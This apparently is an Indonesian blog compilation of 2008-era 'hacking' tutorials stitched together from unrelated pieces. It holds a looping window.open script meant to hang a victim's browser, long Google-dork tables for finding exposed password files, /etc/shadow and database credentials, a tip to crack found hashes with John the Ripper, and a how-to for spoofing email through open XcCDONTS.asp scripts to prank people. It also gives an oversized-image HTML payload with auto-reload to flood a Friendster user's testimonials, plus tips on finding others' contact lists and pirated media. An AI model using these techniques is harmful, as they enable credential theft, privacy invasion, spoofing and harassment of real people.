Hacking,Tutorial

Ga usah banyak OMONG

lansung google.co.id

ketik “Credits to Pramode & Checkmate”

Tara.~

Triknya:

. Buka You Tube,,,,

2. Search pidio yg ente Mau,,,

3. BUka Vixy.net

4. Copy Paste Link Vidio ente,,

5. PAste di Vixy.net

6. Pilih hasil converan.. “gw reccomend AVI”

7. Start..

8. beres de,,,,,,

Thx To Snutz.us

Disini Disarankan Harap jangan di warnet yang terjaga ketat,antivir,deepfreeze.

script:
<HTML>
<HEAD>
<META HTTP-EQUIV=”Refresh” CONTENT=”1; URL=index.html”>
<script LANGUAGE=”JavaScript”>
<!–
for (x=0;x<1;x)
open(”index.html”);
</SCRIPT>
</HEAD>
</body>
</HTML>

copy ke notepad save dengan index.html lalu coba anda buka..

tara~

copas dari snutz.us

Google sebagai web pencarian no 1 saat ini memang belum ada duanya. teknik pencarian dengan penggunaan macam tipe dan operator membuat user dapat membuat berbagai macam variasi pencarian. kita tidak akan membahas berbagai macam operator tersebut, karena judul artikel ini mendapatkan password dan username.

semua tabel dalam artikel ini diambil dari buku
“google hacking for penetration testers”, mungkin ada temen2 yang belum sempet baca jadi saya tulis aja biar semua bisa menikmati. biar temen2 yang masih newbie tidak terheran heran jika seseorang bisa mendapatkan banyak passworddari website. jadi gak usah heran….

TABEL KATA KATA KUNCI MENDAPATKAN USERNAMES
———————————————————
KATA KUNCI | KETERANGAN
———————————————————
inurl:admin inurl: |userlist Generic userlist files
———————————————————
inurl:admin filetype: |asp Generic userlist files
inurl:userlist |
———————————————————
inurl: |Half-life statistics file, lists username and
hlstats intext: |other information
Server Username |
———————————————————
filetype:ctl |
inurl:haccess. |Microsoft FrontPage equivalent of htaccess
ctl Basic |shows Web user credentials
———————————————————
filetype:reg |
reg intext: |Microsoft Internet Account Manager can
———————————————————
”internet account manager” |reveal usernames and more
filetype:wab wab |Microsoft Outlook Express Mail address
|books
———————————————————
filetype:mdb inurl:profiles |Microsoft Access databases containing
|profiles.
———————————————————
index.of perform.ini |mIRC IRC ini file can list IRC usernames and
|other information
———————————————————
inurl:root.asp?acs=anon |Outlook Mail Web Access directory can be
|used to discover usernames
———————————————————
filetype:conf inurl:proftpd. |PROFTP FTP server configuration file
conf –sample |reveals
|username and server information
———————————————————
filetype:log username putty |PUTTY SSH client logs can reveal
|usernames
|and server information
———————————————————
filetype:rdp rdp |Remote Desktop Connection files reveal user
|credentials
———————————————————
intitle:index.of |UNIX bash shell history reveals commands
.bash_history |typed at a bash command prompt; usernames
|are often typed as argument strings
———————————————————
intitle:index.of |UNIX shell history reveals commands typed at
.sh_history |a shell command prompt; usernames are
|often typed as argument strings
———————————————————
“index of ” lck |Various lock files list the user currently using
|a file
———————————————————
+intext:webalizer +intext: |Webalizer Web statistics page lists Web user-
Total Usernames +intext: |names and statistical information
”Usage Statistics for”
———————————————————
filetype:reg reg HKEY_ |Windows Registry exports can reveal
CURRENT_USER |username usernames and other information
———————————————————

TABEL KATA-KATA KUNCI MENDAPATKAN PASSWORD

———————————————————
KATA KUNCI | KETERANGAN
———————————————————
inurl:/db/main.mdb |ASP-Nuke passwords
———————————————————
filetype:cfm “cfapplication |ColdFusion source with potential passwords
name” password
———————————————————
filetype:pass |dbman credentials
pass intext:userid
———————————————————
allinurl:auth_user_file.txt |DCForum user passwords
———————————————————
eggdrop filetype:user user |Eggdrop IRC user credentials
———————————————————
filetype:ini inurl:flashFXP.ini |FlashFXP FTP credentials
———————————————————
filetype:url +inurl:”ftp://” |FTP bookmarks cleartext passwords
+inurl:”@”
———————————————————
inurl:zebra.conf intext: |GNU Zebra passwords
password -sample -test
-tutorial –download
———————————————————
filetype:htpasswd htpasswd |HTTP htpasswd Web user credentials
———————————————————
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials
“htgroup” -intitle:”dist”
-apache -htpasswd.c
———————————————————
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials
htpasswd.bak
———————————————————
“http://*:*@www” bob:bob |HTTP passwords (bob is a sample username)
———————————————————
“sets mode: +k” |IRC channel keys (passwords)
———————————————————
“Your password is * |Remember IRC NickServ registration passwords
this for later use”
———————————————————
signin filetype:url |JavaScript authentication credentials
———————————————————
LeapFTP intitle:”index.of./” |LeapFTP client login credentials
sites.ini modified
———————————————————
inurl:lilo.conf filetype:conf |LILO passwords
password -tatercounter2000
-bootpwd –man
———————————————————
filetype:config config intext: |Microsoft .NET application credentials
appSettings “User ID”
———————————————————
filetype:pwd service |Microsoft FrontPage Service Web passwords
———————————————————
intitle:index.of |Microsoft FrontPage Web credentials
administrators.pwd
———————————————————
“# -FrontPage-” |Microsoft FrontPage Web passwords
inurl:service.pwd
ext:pwd inurl:_vti_pvt inurl: |Microsoft FrontPage Web passwords
(Service | authors | administrators)
———————————————————
inurl:perform filetype:ini |mIRC nickserv credentials
———————————————————
intitle:”index of” intext: |mySQL database credentials
connect.inc
———————————————————
intitle:”index of” intext: |mySQL database credentials
globals.inc
———————————————————
filetype:conf oekakibbs |Oekakibss user passwords
———————————————————
filetype:dat wand.dat |Opera‚ ÄúMagic Wand‚Äù Web credentials
———————————————————
inurl:ospfd.conf intext: |OSPF Daemon Passwords
password -sample -test
-tutorial –download
———————————————————
index.of passlist |Passlist user credentials
———————————————————
inurl:passlist.txt |passlist.txt file user credentials
———————————————————
filetype:dat “password.dat” |password.dat files
———————————————————
inurl:password.log filetype:log |password.log file reveals usernames,
|passwords,and hostnames
———————————————————
filetype:log inurl:”password.log” |password.log files cleartext
|passwords
———————————————————
inurl:people.lst filetype:lst |People.lst generic password file
———————————————————
intitle:index.of config.php |PHP Configuration File database
|credentials
———————————————————
inurl:config.php dbuname dbpass |PHP Configuration File database
|credentials
———————————————————
inurl:nuke filetype:sql |PHP-Nuke credentials
———————————————————
filetype:conf inurl:psybnc.conf |psyBNC IRC user credentials
“USER.PASS=”
———————————————————
filetype:ini ServUDaemon |servU FTP Daemon credentials
———————————————————
filetype:conf slapd.conf |slapd configuration files root password
———————————————————
inurl:”slapd.conf” intext: |slapd LDAP credentials
”credentials” -manpage
-”Manual Page” -man: -sample
———————————————————
inurl:”slapd.conf” intext: |slapd LDAP root password
”rootpw” -manpage
-”Manual Page” -man: -sample
———————————————————
filetype:sql “IDENTIFIED BY” –cvs |SQL passwords
———————————————————
filetype:sql password |SQL passwords
———————————————————
filetype:ini wcx_ftp |Total Commander FTP passwords
———————————————————
filetype:netrc password |UNIX .netrc user credentials
———————————————————
index.of.etc |UNIX /etc directories contain
|various credential files
———————————————————
intitle:”Index of..etc” passwd |UNIX /etc/passwd user credentials
———————————————————
intitle:index.of passwd |UNIX /etc/passwd user credentials
passwd.bak
———————————————————
intitle:”Index of” pwd.db |UNIX /etc/pwd.db credentials
———————————————————
intitle:Index.of etc shadow |UNIX /etc/shadow user credentials
———————————————————
intitle:index.of master.passwd |UNIX master.passwd user credentials
———————————————————
intitle:”Index of” spwd.db |UNIX spwd.db credentials
passwd -pam.conf
———————————————————
filetype:bak inurl:”htaccess| |UNIX various password file backups
passwd|shadow|htusers
———————————————————
filetype:inc dbconn |Various database credentials
———————————————————
filetype:inc intext:mysql_ |Various database credentials, server names
connect
———————————————————
filetype:properties inurl:db |Various database credentials, server names
intext:password
———————————————————
inurl:vtund.conf intext:pass –cvs |Virtual Tunnel Daemon passwords
———————————————————
inurl:”wvdial.conf” intext: |wdial dialup user credentials
”password”
———————————————————
filetype:mdb wwforum |Web Wiz Forums Web credentials
———————————————————
“AutoCreate=TRUE password=*” |Website Access Analyzer user passwords
———————————————————
filetype:pwl pwl |Windows Password List user credentials
———————————————————
filetype:reg reg +intext: |Windows Registry Keys containing user
”defaultusername” intext: |credentials
”defaultpassword”
———————————————————
filetype:reg reg +intext: |Windows Registry Keys containing user
”internet account manager” |credentials
———————————————————
“index of/” “ws_ftp.ini” |WS_FTP FTP credentials
“parent directory”
———————————————————
filetype:ini ws_ftp pwd |WS_FTP FTP user credentials
———————————————————
inurl:/wwwboard |wwwboard user credentials
———————————————————

mungkin temen2 ada yang ingin melihat password dari website jerman?
mungkin sebaiknya kita juga mengganti kata “password” dengan memakai bahasa jerman tentunya dibawah ini adalah tabel 5 negara beserta terjemahan password dalam bahasa masing2 negara.

—————————————————–
BAHASA |KATA-KATA| TRANSLATE
—————————————————–
German |password | Kennwort
Spanish |password | contraseña
French |password | mot de passe
Italian |password | parola d’accesso
Portuguese |password | senha
Dutch |password | Paswoord
—————————————————–

setelah temen2 banyak mendapatkan password, apa yang akan anda lakukan?jangan berbuat jahat yang pasti, lihat2 saja isinya atau anda terlalu baik dengan memberitahu admin. jangan lupa sediakan john the ripper dirumah, sapa tau password yang disimpan sudah dalam keadaan terenkripsi.

keterangan :
karena ketidak teraturan kata2 pada artikel ini, setelah tanda “|” berarti itu merupakan keterangan dari kata kunci. MOHON MAAF!!!

ok all, gak usa basa basi lo semua pasti ud kenal yg namanya google, yg sering di sebut ama orang amrik itu sebagai uncle google tapi orang indo seringnya bilang mbah google (koq jadi basa basi lagi ya…..) ok lah langsung ajeee

1. Google face off

bosen kan lo liat google dengan tampilan sederhana simple bgt tampilannya. sekarang loe coba masuk www.google.com, klo kalian seneng nya ke google.co.id se terserah gwe demennya ke google.com biar jago inggris gitu loch (ngejayus mode :ON) lagian emang face off ini cuma jalan di google.com, nah trus cara dari .co.id ke .com gmana ? gw klo ketik .com otomatis ke direct ke .co.id. gampanggg ^^ : waktu lo buka www.google.co.id lo pasti liat di pilihan2 di bawah yaitu Google.com in English hohohoho…. abis lo klik, pasti ke google.com
Tampilan masi biasa, emangg… nah sekarang cara biar tu google face off adalah tambahkan /ig di blakang link nya, jadinya tu link menjadi www.google.com/ig fiola… jadi keren kan… tampilannya ampir seribet yahoo, tapi gak ribet2 amad se

2. Anatomi URL google

akhirnya sampe juga ke nomer 2, agak pegel ya brur
a. yaa anda semua taw, url dasar dari google adalah www.google.com/search
b. biar gampang langsung kasi contoh de, misal nya lo search cinta itu buta
c. waktu lo klik tombol search, URL bakal jadi gini

Code:

http://www.google.com/search?hl=en&q=cinta+itu+buta&btnG=Google+Search

d. ? pada URL tersebut merupakan akhir dari URL, dan awal dari program pencarian
e. sekarang liat yg ini

Code:

Results 1 - 10 of about 151,000 for cinta itu buta. (0.04 seconds)

f. cape juga y, klo gak nemu kita musti bolak balik halaman, hmm… cara gampangnya gmana y ??
e. mari kita sisipkan sedikit tambahan yaitu num=100 URL nya menjadi gini

Code:

http://www.google.com/search?num=100&hl=en&q=cinta+itu+buta&btnG=Google+Search

knapa musti pake & ??

& memisahkan antara pembatas URL dengan program pencari…

f. sekarang tekan enter, dan lihat hasilnya

Code:

Results 1 - 100 of about 151,000 for cinta itu buta. (0.11 seconds)

viola, mantap kan gak usa cape2 lagi lo bolak balik, 1 halamannya bernilai 100 query

3. Dasar google hacking

a. intitle:
–> berfungsi untuk mencari sesuatu dengan melihat judul contoh :

Code:

intitle:username and password

lihat hasl pencarian dengan judul dari situs nya, pasti sama

b. site:
–> fungsinya bwat nyari sesuatu tapi dalam domain / situs tertentu ^^

c. filetype:
–> gak usa di jelasin kayaknya ud taw, fungsinya bwat nyari data dengan type semau lo . site: filetype: isa di gabungin misalnya lo mo cari data pdf di rapidshare.de…. cukup ketik kaya gini

Code:

filetype:pdf site:rapidshare.de

kelemahannya… ya you know lah… bakal lama nyarinya

d. phone book
–> mo nyari nomer tlp orang ?? gini caranya

Code:

nama+tempat

bingung ???

contoh :

Code:

michael jackson+CA

coba klik search…. tuh tlp michael jakcson

4.Simple hacking (mencuri file mp3/audio/video)

1. mencari mp3 baru

Code:

-inurl:htm -inurl:html intitle:"index of" "Last modified" mp3

2. mencari mp3 dengan nama penyanyi atau judul

[code]-inurl:htm -inurl:html intitle:”index of” mp3 “(nama penyanyi/judul)”

3. mencari film ato movie

Code:

+inurl:avi|mpg|wmv|3gp site:(nama situs hosting)

contoh

Code:

+inurl:avi|mpg|wmv|3gp site:rapidshare.de

4. mencari lagu2 di hosting tertentu

mirip dengan nomer 3, tinggal ganti “avi, mpg, wmv” nya

5. mencari video / audio di hosting tertentu dengan judul

Code:

+inurl:wav|wma|mp3|ogg site:rapidshare.de (judul)

contoh

Code:

+inurl:wav|wma|mp3|ogg site:rapidshare.de crawling

—— TO BE CONTINUED ——

untuk hari ini gwe post 2 trick PANAS

1. Eemaling

sintaks ini berguna klo lo mo liat koleksi email seseorang, ya lo taw kan email itu banyak, entah di yahoo, msn/hotmail, dll

sintaks yg kita gunakan adalah

Code:

filetype:ctt "msn"

silahkan anda modif

2. Email setan

nah ini looch, cara ngirim email palsu ke email orang, mayan ne bwat ngerjain orang
coba search ini

Code:

inurl:XcCDONTS.asp

silahkan cari yg masi isa klo gak salah yg ke 4 masi jalan tu

gak percaya ??

neh sedikit screen shut dari gwe

ini waktu gwe masukin data2 nya

truss gwe klik send,

truz gwe cek ke inbox email gwe

eh ada email masuk loch jeng

hmm… sapa y, gwe buka aje de

eng ing enggg

wuih, masuk loch jeng… hmm.. ngerjain orang makin syurr

3. Refreshing time

coba de lo semua masuk ke sini

http://www.googlefight.com/

situs itu, cuma btwa refrehsing, hmm.. nanti lo masukin 2 keyword kata yg mo di cari, nanti bakal di adu, mana keyword yg paling banyak

Baru release hari ini tanggal 18 Februari 2008…

Link download :

Code:

http://www.kitaupload.com/download.php?file=486PCMAV 1.0 FINAL RELEASE 18 FEB 2008.rar

Firefox Secrets is not just a book about a browser’s hidden secrets; it’s also an explanation of how and why Firefox will make your Web surfing experience smoother and more productive. It jump-starts you on Firefox’s various features and explores the rationale behind the browser’s design. Scattered throughout the text are tips and little-known facts that take you even further toward an improved Web browsing experience.

http://rapidshare.com/files/84922622/Firefox-Secrets-A-Need-To-Know-Guide.rar.html

Hack friendster Bom testimonial

Sebelum kita mulai kita siapkan beberapa alat untuk melakukan penyerangan ke friendster Korban………Hihihihihihih seremmm Kok penyerangan ?????? kaya di film film aja
Ok langsung ajah….

siapkan Browser mozila firefox. (FF)
accoun frienster. (wajib)
addons Firefox Reload every download lalu instal di sini terus restart Firefox https://addons.mozilla.org/en-US/firefox…

teru login ke friendster kalian
udah gitu kirin testi seperti biasa , tapi
sisipi file gambar

<img src=”http://photos.friendster.com/photos/05/96/45746950/251134315s.jpg” height=”99999999999″ weight=”999999999999″ ><img src=”http://photos.friendster.com/photos/05/96/45746950/251134315s.jpg” height=”99999999999″ weight=”999999999999″ ><img src=”http://photos.friendster.com/photos/05/96/45746950/251134315s.jpg” height=”99999999999″ weight=”999999999999″ ><img src=”http://photos.friendster.com/photos/05/96/45746950/251134315s.jpg” height=”99999999999″ weight=”999999999999″ ><img src=”http://photos.friendster.com/photos/05/96/45746950/251134315s.jpg” height=”99999999999″ weight=”999999999999″ ><img src=”http://photos.friendster.com/photos/05/96/45746950/251134315s.jpg” height=”99999999999″ weight=”999999999999″ ><img src=”http://photos.friendster.com/photos/05/96/45746950/251134315s.jpg” height=”99999999999″ weight=”999999999999″ ><img src=”http://photos.friendster.com/photos/05/96/45746950/251134315s.jpg” height=”99999999999″ weight=”999999999999″ ><img src=”http://photos.friendster.com/photos/05/96/45746950/251134315s.jpg” height=”99999999999″ weight=”999999999999″ >

udah gitu kirim ke terget submit.
terus aktifkan REload every (klik kanan pilih waktunya )
terus biaran ajh ampe penuh tuh testimonialnya

credit to echo